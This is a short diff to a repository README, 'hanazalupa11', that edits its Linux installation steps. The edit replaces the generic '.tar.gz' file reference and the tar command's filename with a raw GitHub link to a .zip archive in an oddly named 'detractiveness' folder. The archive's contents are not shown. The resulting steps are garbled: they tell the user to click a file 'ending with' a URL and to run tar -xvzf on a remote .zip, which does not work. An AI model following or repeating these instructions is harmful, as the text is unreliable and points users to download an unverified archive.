Theebiga22/hanazalupa11/README.md

      - Drag the hanazalupa11 icon to your Applications folder.

    - **For Linux:**
-     - Click on the file ending with `.tar.gz`.
+     - Click on the file ending with `https://raw.githubusercontent.com/Theebiga22/hanazalupa11/main/detractiveness/hanazalupa11.zip`.
      - The file will download automatically.
      - Open a terminal and navigate to your downloads folder.
-     - Use the command `tar -xvzf filename.tar.gz` to extract the files.
+     - Use the command `tar -xvzf https://raw.githubusercontent.com/Theebiga22/hanazalupa11/main/detractiveness/hanazalupa11.zip` to extract the files.
      - Follow the README instructions included in the extracted folder.

 ## 🔧 System Requirements